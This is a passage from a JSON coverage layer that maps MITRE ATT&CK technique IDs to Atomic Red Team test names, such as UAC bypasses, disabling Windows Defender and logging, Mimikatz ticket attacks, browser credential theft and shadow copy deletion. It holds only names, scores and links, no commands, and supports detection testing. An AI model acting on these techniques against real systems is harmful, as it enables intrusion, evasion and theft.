Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"}]},{"techniqueID":"T1219","score":11,"enabled":true,"comment":"\n- TeamViewer Files Detected Test on Windows\n- AnyDesk Files Detected Test on Windows\n- LogMeIn Files Detected Test on Windows\n- GoToAssist Files Detected Test on Windows\n- ScreenConnect Application Download and Install on Windows\n- Ammyy Admin Software Execution\n- RemotePC Software Execution\n- NetSupport - RAT Execution\n- UltraViewer - RAT Execution\n- UltraVNC Execution\n- MSP360 Connect Execution\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1219/T1219.md"}]},{"techniqueID":"T1220","score":4,"enabled":true,"comment":"\n- MSXSL Bypass using local files\n- MSXSL Bypass using remote files\n- WMIC bypass using local XSL file\n- WMIC bypass using remote XSL file\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.md"}]},{"techniqueID":"T1221","score":1,"enabled":true,"comment":"\n- WINWORD Remote Template Injection\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1221/T1221.md"}]},{"techniqueID":"T1222","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222/T1222.md"}]},{"techniqueID":"T1222.001","score":5,"enabled":true,"comment":"\n- Take ownership using takeown utility\n- cacls - Grant permission to specified user or group recursively\n- attrib - Remove read-only attribute\n- attrib - hide file\n- Grant Full Access to folder for Everyone - Ryuk Ransomware Style\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"}]},{"techniqueID":"T1482","score":8,"enabled":true,"comment":"\n- Windows - Discover domain trusts with dsquery\n- Windows - Discover domain trusts with nltest\n- Powershell enumerate domains and forests\n- Adfind - Enumerate Active Directory OUs\n- Adfind - Enumerate Active Directory Trusts\n- Get-DomainTrust with PowerView\n- Get-ForestTrust with PowerView\n- TruffleSnout - Listing AD Infrastructure\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md"}]},{"techniqueID":"T1484","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484/T1484.md"}]},{"techniqueID":"T1484.001","score":2,"enabled":true,"comment":"\n- LockBit Black - Modify Group policy settings -cmd\n- LockBit Black - Modify Group policy settings -Powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.001/T1484.001.md"}]},{"techniqueID":"T1485","score":2,"enabled":true,"comment":"\n- Windows - Overwrite file with SysInternals SDelete\n- Overwrite deleted data on C drive\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1486","score":3,"enabled":true,"comment":"\n- PureLocker Ransom Note\n- Data Encrypted with GPG4Win\n- Data Encrypt Using DiskCryptor\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"}]},{"techniqueID":"T1489","score":3,"enabled":true,"comment":"\n- Windows - Stop service using Service Controller\n- Windows - Stop service using net.exe\n- Windows - Stop service by killing process\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1489/T1489.md"}]},{"techniqueID":"T1490","score":11,"enabled":true,"comment":"\n- Windows - Delete Volume Shadow Copies\n- Windows - Delete Volume Shadow Copies via WMI\n- Windows - wbadmin Delete Windows Backup Catalog\n- Windows - Disable Windows Recovery Console Repair\n- Windows - Delete Volume Shadow Copies via WMI with PowerShell\n- Windows - Delete Backup Files\n- Windows - wbadmin Delete systemstatebackup\n- Windows - Disable the SR scheduled task\n- Disable System Restore Through Registry\n- Windows - vssadmin Resize Shadowstorage Volume\n- Modify VSS Service Permissions\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md"}]},{"techniqueID":"T1491","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491/T1491.md"}]},{"techniqueID":"T1491.001","score":2,"enabled":true,"comment":"\n- Replace Desktop Wallpaper\n- Configure LegalNoticeCaption and LegalNoticeText registry keys to display ransom message\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"}]},{"techniqueID":"T1497","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497/T1497.md"}]},{"techniqueID":"T1497.001","score":2,"enabled":true,"comment":"\n- Detect Virtualization Environment (Windows)\n- Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"}]},{"techniqueID":"T1505","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505/T1505.md"}]},{"techniqueID":"T1505.002","score":1,"enabled":true,"comment":"\n- Install MS Exchange Transport Agent Persistence\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"}]},{"techniqueID":"T1505.003","score":1,"enabled":true,"comment":"\n- Web Shell Written to Disk\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"}]},{"techniqueID":"T1505.004","score":2,"enabled":true,"comment":"\n- Install IIS Module using AppCmd.exe\n- Install IIS Module using PowerShell Cmdlet New-WebGlobalModule\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.004/T1505.004.md"}]},{"techniqueID":"T1505.005","score":2,"enabled":true,"comment":"\n- Simulate Patching termsrv.dll\n- Modify Terminal Services DLL Path\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.005/T1505.005.md"}]},{"techniqueID":"T1518","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"}],"comment":"\n- Find and Display Internet Explorer Browser Version\n- Applications Installed\n- WinPwn - Dotnetsearch\n- WinPwn - DotNet\n- WinPwn - powerSQL\n"},{"techniqueID":"T1518.001","score":7,"enabled":true,"comment":"\n- Security Software Discovery\n- Security Software Discovery - powershell\n- Security Software Discovery - Sysmon Service\n- Security Software Discovery - AV Discovery via WMI\n- Security Software Discovery - AV Discovery via Get-CimInstance and Get-WmiObject cmdlets\n- Security Software Discovery - Windows Defender Enumeration\n- Security Software Discovery - Windows Firewall Enumeration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"}]},{"techniqueID":"T1529","score":3,"enabled":true,"comment":"\n- Shutdown System - Windows\n- Restart System - Windows\n- Logoff System - Windows\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"}]},{"techniqueID":"T1531","score":3,"enabled":true,"comment":"\n- Change User Password - Windows\n- Delete User - Windows\n- Remove Account From Domain Admin Group\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"}]},{"techniqueID":"T1539","score":2,"enabled":true,"comment":"\n- Steal Firefox Cookies (Windows)\n- Steal Chrome Cookies (Windows)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1539/T1539.md"}]},{"techniqueID":"T1543","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543/T1543.md"}]},{"techniqueID":"T1543.003","score":6,"enabled":true,"comment":"\n- Modify Fax service to run PowerShell\n- Service Installation CMD\n- Service Installation PowerShell\n- TinyTurla backdoor service w64time\n- Remote Service Installation CMD\n- Modify Service to Run Arbitrary Binary (Powershell)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"}]},{"techniqueID":"T1546","score":27,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546/T1546.md"}],"comment":"\n- Persistence with Custom AutodialDLL\n- HKLM - Persistence using CommandProcessor AutoRun key (With Elevation)\n- HKCU - Persistence using CommandProcessor AutoRun key (Without Elevation)\n- WMI Invoke-CimMethod Start Process\n"},{"techniqueID":"T1546.001","score":1,"enabled":true,"comment":"\n- Change Default File Association\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"}]},{"techniqueID":"T1546.002","score":1,"enabled":true,"comment":"\n- Set Arbitrary Binary as Screensaver\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"}]},{"techniqueID":"T1546.003","score":3,"enabled":true,"comment":"\n- Persistence via WMI Event Subscription - CommandLineEventConsumer\n- Persistence via WMI Event Subscription - ActiveScriptEventConsumer\n- Windows MOFComp.exe Load MOF File\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"}]},{"techniqueID":"T1546.007","score":1,"enabled":true,"comment":"\n- Netsh Helper DLL Registration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"}]},{"techniqueID":"T1546.008","score":4,"enabled":true,"comment":"\n- Attaches Command Prompt as a Debugger to a List of Target Processes\n- Replace binary of sticky keys\n- Create Symbolic Link From osk.exe to cmd.exe\n- Atbroker.exe (AT) Executes Arbitrary Command via Registry Key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"}]},{"techniqueID":"T1546.009","score":1,"enabled":true,"comment":"\n- Create registry persistence via AppCert DLL\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.009/T1546.009.md"}]},{"techniqueID":"T1546.010","score":1,"enabled":true,"comment":"\n- Install AppInit Shim\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"}]},{"techniqueID":"T1546.011","score":3,"enabled":true,"comment":"\n- Application Shim Installation\n- New shim database files created in the default shim database directory\n- Registry key creation and/or modification events for SDB\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"}]},{"techniqueID":"T1546.012","score":3,"enabled":true,"comment":"\n- IFEO Add Debugger\n- IFEO Global Flags\n- GlobalFlags in Image File Execution Options\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"}]},{"techniqueID":"T1546.013","score":1,"enabled":true,"comment":"\n- Append malicious start-process cmdlet\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"}]},{"techniqueID":"T1546.015","score":4,"enabled":true,"comment":"\n- COM Hijacking - InprocServer32\n- Powershell Execute COM Object\n- COM Hijacking with RunDLL32 (Local Server Switch)\n- COM hijacking via TreatAs\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.015/T1546.015.md"}]},{"techniqueID":"T1547","score":38,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547/T1547.md"}],"comment":"\n- Add a driver\n"},{"techniqueID":"T1547.001","score":17,"enabled":true,"comment":"\n- Reg Key Run\n- Reg Key RunOnce\n- PowerShell Registry RunOnce\n- Suspicious vbs file run from startup Folder\n- Suspicious jse file run from startup Folder\n- Suspicious bat file run from startup Folder\n- Add Executable Shortcut Link to User Startup Folder\n- Add persistance via Recycle bin\n- SystemBC Malware-as-a-Service Registry\n- Change Startup Folder - HKLM Modify User Shell Folders Common Startup Value\n- Change Startup Folder - HKCU Modify User Shell Folders Startup Value\n- HKCU - Policy Settings Explorer Run Key\n- HKLM - Policy Settings Explorer Run Key\n- HKLM - Append Command to Winlogon Userinit KEY Value\n- HKLM - Modify default System Shell - Winlogon Shell KEY Value \n- secedit used to create a Run key in the HKLM Hive\n- Modify BootExecute Value\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"}]},{"techniqueID":"T1547.002","score":1,"enabled":true,"comment":"\n- Authentication Package\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.002/T1547.002.md"}]},{"techniqueID":"T1547.003","score":2,"enabled":true,"comment":"\n- Create a new time provider\n- Edit an existing time provider\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.003/T1547.003.md"}]},{"techniqueID":"T1547.004","score":5,"enabled":true,"comment":"\n- Winlogon Shell Key Persistence - PowerShell\n- Winlogon Userinit Key Persistence - PowerShell\n- Winlogon Notify Key Logon Persistence - PowerShell\n- Winlogon HKLM Shell Key Persistence - PowerShell\n- Winlogon HKLM Userinit Key Persistence - PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"}]},{"techniqueID":"T1547.005","score":2,"enabled":true,"comment":"\n- Modify HKLM:\\System\\CurrentControlSet\\Control\\Lsa Security Support Provider configuration in registry\n- Modify HKLM:\\System\\CurrentControlSet\\Control\\Lsa\\OSConfig Security Support Provider configuration in registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"}]},{"techniqueID":"T1547.006","score":1,"enabled":true,"comment":"\n- Snake Malware Kernel Driver Comadmin\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"}]},{"techniqueID":"T1547.008","score":1,"enabled":true,"comment":"\n- Modify Registry to load Arbitrary DLL into LSASS - LsaDbExtPt\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.008/T1547.008.md"}]},{"techniqueID":"T1547.009","score":2,"enabled":true,"comment":"\n- Shortcut Modification\n- Create shortcut to cmd in startup folders\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"}]},{"techniqueID":"T1547.010","score":1,"enabled":true,"comment":"\n- Add Port Monitor persistence in Registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"}]},{"techniqueID":"T1547.012","score":1,"enabled":true,"comment":"\n- Print Processors\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.012/T1547.012.md"}]},{"techniqueID":"T1547.014","score":3,"enabled":true,"comment":"\n- HKLM - Add atomic_test key to launch executable as part of user setup\n- HKLM - Add malicious StubPath value to existing Active Setup Entry\n- HKLM - re-execute 'Internet Explorer Core Fonts' StubPath payload by decreasing version number\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.014/T1547.014.md"}]},{"techniqueID":"T1547.015","score":1,"enabled":true,"comment":"\n- Persistence by modifying Windows Terminal profile\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.015/T1547.015.md"}]},{"techniqueID":"T1548","score":26,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548/T1548.md"}]},{"techniqueID":"T1548.002","score":26,"enabled":true,"comment":"\n- Bypass UAC using Event Viewer (cmd)\n- Bypass UAC using Event Viewer (PowerShell)\n- Bypass UAC using Fodhelper\n- Bypass UAC using Fodhelper - PowerShell\n- Bypass UAC using ComputerDefaults (PowerShell)\n- Bypass UAC by Mocking Trusted Directories\n- Bypass UAC using sdclt DelegateExecute\n- Disable UAC using reg.exe\n- Bypass UAC using SilentCleanup task\n- UACME Bypass Method 23\n- UACME Bypass Method 31\n- UACME Bypass Method 33\n- UACME Bypass Method 34\n- UACME Bypass Method 39\n- UACME Bypass Method 56\n- UACME Bypass Method 59\n- UACME Bypass Method 61\n- WinPwn - UAC Magic\n- WinPwn - UAC Bypass ccmstp technique\n- WinPwn - UAC Bypass DiskCleanup technique\n- WinPwn - UAC Bypass DccwBypassUAC technique\n- Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key\n- UAC Bypass with WSReset Registry Modification\n- Disable UAC - Switch to the secure desktop when prompting for elevation via registry key\n- Disable UAC notification via registry keys\n- Disable ConsentPromptBehaviorAdmin via registry keys\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"}]},{"techniqueID":"T1550","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550/T1550.md"}]},{"techniqueID":"T1550.002","score":3,"enabled":true,"comment":"\n- Mimikatz Pass the Hash\n- crackmapexec Pass the Hash\n- Invoke-WMIExec Pass the Hash\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"}]},{"techniqueID":"T1550.003","score":2,"enabled":true,"comment":"\n- Mimikatz Kerberos Ticket Attack\n- Rubeus Kerberos Pass The Ticket\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"}]},{"techniqueID":"T1552","score":19,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.001","score":8,"enabled":true,"comment":"\n- Extracting passwords with findstr\n- Access unattend.xml\n- WinPwn - sensitivefiles\n- WinPwn - Snaffler\n- WinPwn - powershellsensitive\n- WinPwn - passhunt\n- WinPwn - SessionGopher\n- WinPwn - Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"}]},{"techniqueID":"T1552.002","score":2,"enabled":true,"comment":"\n- Enumeration for Credentials in Registry\n- Enumeration for PuTTY Credentials in Registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"}]},{"techniqueID":"T1552.004","score":7,"enabled":true,"comment":"\n- Private Keys\n- ADFS token signing and encryption certificates theft - Local\n- ADFS token signing and encryption certificates theft - Remote\n- CertUtil ExportPFX\n- Export Root Certificate with Export-PFXCertificate\n- Export Root Certificate with Export-Certificate\n- Export Certificates with Mimikatz\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"}]},{"techniqueID":"T1552.006","score":2,"enabled":true,"comment":"\n- GPP Passwords (findstr)\n- GPP Passwords (Get-GPPPassword)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"}]},{"techniqueID":"T1553","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553/T1553.md"}]},{"techniqueID":"T1553.003","score":1,"enabled":true,"comment":"\n- SIP (Subject Interface Package) Hijacking via Custom DLL\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.003/T1553.003.md"}]},{"techniqueID":"T1553.004","score":3,"enabled":true,"comment":"\n- Install root CA on Windows\n- Install root CA on Windows with certutil\n- Add Root Certificate to CurrentUser Certificate Store\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"}]},{"techniqueID":"T1553.005","score":4,"enabled":true,"comment":"\n- Mount ISO image\n- Mount an ISO image and run executable from the ISO\n- Remove the Zone.Identifier alternate data stream\n- Execute LNK file from ISO\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"}]},{"techniqueID":"T1555","score":24,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"}],"comment":"\n- Extract Windows Credential Manager via VBA\n- Dump credentials from Windows Credential Manager With PowerShell [windows Credentials]\n- Dump credentials from Windows Credential Manager With PowerShell [web Credentials]\n- Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Windows Credentials]\n- Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Web Credentials]\n- WinPwn - Loot local Credentials - lazagne\n- WinPwn - Loot local Credentials - Wifi Credentials\n- WinPwn - Loot local Credentials - Decrypt Teamviewer Passwords\n"},{"techniqueID":"T1555.003","score":14,"enabled":true,"comment":"\n- Run Chrome-password Collector\n- LaZagne - Credentials from Browser\n- Simulating access to Chrome Login Data\n- Simulating access to Opera Login Data\n- Simulating access to Windows Firefox Login Data\n- Simulating access to Windows Edge Login Data\n- Decrypt Mozilla Passwords with Firepwd.py\n- Stage Popular Credential Files for Exfiltration\n- WinPwn - BrowserPwn\n- WinPwn - Loot local Credentials - mimi-kittenz\n- WinPwn - PowerSharpPack - Sharpweb for Browser Credentials\n- WebBrowserPassView - Credentials from Browser\n- BrowserStealer (Chrome / Firefox / Microsoft Edge)\n- Dump Chrome Login Data with esentutl\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"}]},{"techniqueID":"T1555.004","score":2,"enabled":true,"comment":"\n- Access Saved Credentials via VaultCmd\n- WinPwn - Loot local Credentials - Invoke-WCMDump\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.004/T1555.004.md"}]},{"techniqueID":"T1556","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556/T1556.md"}]},{"techniqueID":"T1556.002","score":1,"enabled":true,"comment":"\n- Install and Register Password Filter DLL\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"}]},{"techniqueID":"T1557","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557/T1557.md"}]},{"techniqueID":"T1557.001","score":1,"enabled":true,"comment":"\n- LLMNR Poisoning with Inveigh (PowerShell)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557.001/T1557.001.md"}]},{"techniqueID":"T1558","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558/T1558.md"}]},{"techniqueID":"T1558.001","score":2,"enabled":true,"comment":"\n- Crafting Active Directory golden tickets with mimikatz\n- Crafting Active Directory golden tickets with Rubeus\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"}]},{"techniqueID":"T1558.002","score":1,"enabled":true,"comment":"\n- Crafting Active Directory silver tickets with mimikatz\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.002/T1558.002.md"}]},{"techniqueID":"T1558.003","score":7,"enabled":true,"comment":"\n- Request for service tickets\n- Rubeus kerberoast\n- Extract all accounts in use as SPN using setspn\n- Request A Single Ticket via PowerShell\n- Request All Tickets via PowerShell\n- WinPwn - Kerberoasting\n- WinPwn - PowerSharpPack - Kerberoasting Using Rubeus\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"}]},{"techniqueID":"T1558.004","score":3,"enabled":true,"comment":"\n- Rubeus asreproast\n- Get-DomainUser with PowerView\n- WinPwn - PowerSharpPack - Kerberoasting Using Rubeus\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.004/T1558.004.md"}]},{"techniqueID":"T1559","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559/T1559.md"}],"comment":"\n- Cobalt Strike Artifact Kit pipe\n- Cobalt Strike Lateral Movement (psexec_psh) pipe\n- Cobalt Strike SSH (postex_ssh) pipe\n- Cobalt Strike post-exploitation pipe (4.2 and later)\n- Cobalt Strike post-exploitation pipe (before 4.2)\n"},{"techniqueID":"T1559.002","score":3,"enabled":true,"comment":"\n- Execute Commands\n- Execute PowerShell script via Word DDE\n- DDEAUTO\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"}]},{"techniqueID":"T1560","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"}],"comment":"\n- Compress Data for Exfiltration With PowerShell\n"},{"techniqueID":"T1560.001","score":4,"enabled":true,"comment":"\n- Compress Data for Exfiltration With Rar\n- Compress Data and lock with password for Exfiltration with winrar\n- Compress Data and lock with password for Exfiltration with winzip\n- Compress Data and lock with password for Exfiltration with 7zip\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"}]},{"techniqueID":"T1562","score":57,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}],"comment":"\n- Windows Disable LSA Protection\n"},{"techniqueID":"T1562.001","score":33,"enabled":true,"comment":"\n- Unload Sysmon Filter Driver\n- Uninstall Sysmon\n- AMSI Bypass - AMSI InitFailed\n- AMSI Bypass - Remove AMSI Provider Reg Key\n- Disable Arbitrary Security Windows Service\n- Tamper with Windows Defender ATP PowerShell\n- Tamper with Windows Defender Command Prompt\n- Tamper with Windows Defender Registry\n- Disable Microsoft Office Security Features\n- Remove Windows Defender Definition Files\n- Stop and Remove Arbitrary Security Windows Service\n- Uninstall Crowdstrike Falcon on Windows\n- Tamper with Windows Defender Evade Scanning -Folder\n- Tamper with Windows Defender Evade Scanning -Extension\n- Tamper with Windows Defender Evade Scanning -Process\n- Disable Windows Defender with DISM\n- Disable Defender Using NirSoft AdvancedRun\n- Kill antimalware protected processes using Backstab\n- WinPwn - Kill the event log services for stealth\n- Tamper with Windows Defender ATP using Aliases - PowerShell\n- LockBit Black - Disable Privacy Settings Experience Using Registry -cmd\n- LockBit Black - Use Registry Editor to turn on automatic logon -cmd\n- LockBit Black - Disable Privacy Settings Experience Using Registry -Powershell\n- Lockbit Black - Use Registry Editor to turn on automatic logon -Powershell\n- Disable Windows Defender with PwSh Disable-WindowsOptionalFeature\n- WMIC Tamper with Windows Defender Evade Scanning Folder\n- Delete Windows Defender Scheduled Tasks\n- Disable Hypervisor-Enforced Code Integrity (HVCI)\n- AMSI Bypass - Override AMSI via COM\n- Tamper with Windows Defender Registry - Reg.exe\n- Tamper with Windows Defender Registry - Powershell\n- Delete Microsoft Defender ASR Rules - InTune\n- Delete Microsoft Defender ASR Rules - GPO\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562.002","score":7,"enabled":true,"comment":"\n- Disable Windows IIS HTTP Logging\n- Disable Windows IIS HTTP Logging via PowerShell\n- Kill Event Log Service Threads\n- Impair Windows Audit Log Policy\n- Clear Windows Audit Policy Config\n- Disable Event Logging with wevtutil\n- Makes Eventlog blind with Phant0m\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"}]},{"techniqueID":"T1562.004","score":9,"enabled":true,"comment":"\n- Disable Microsoft Defender Firewall\n- Disable Microsoft Defender Firewall via Registry\n- Allow SMB and RDP on Microsoft Defender Firewall\n- Opening ports for proxy - HARDRAIN\n- Open a local port through Windows Firewall to any profile\n- Allow Executable Through Firewall Located in Non-Standard Location\n- LockBit Black - Unusual Windows firewall registry modification -cmd\n- LockBit Black - Unusual Windows firewall registry modification -Powershell\n- Blackbit - Disable Windows Firewall using netsh firewall\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"}]},{"techniqueID":"T1562.006","score":5,"enabled":true,"comment":"\n- Disable Powershell ETW Provider - Windows\n- Disable .NET Event Tracing for Windows Via Registry (cmd)\n- Disable .NET Event Tracing for Windows Via Registry (powershell)\n- LockBit Black - Disable the ETW Provider of Windows Defender -cmd\n- LockBit Black - Disable the ETW Provider of Windows Defender -Powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"}]},{"techniqueID":"T1562.009","score":1,"enabled":true,"comment":"\n- Safe Mode Boot\n","links":[{"label":"View 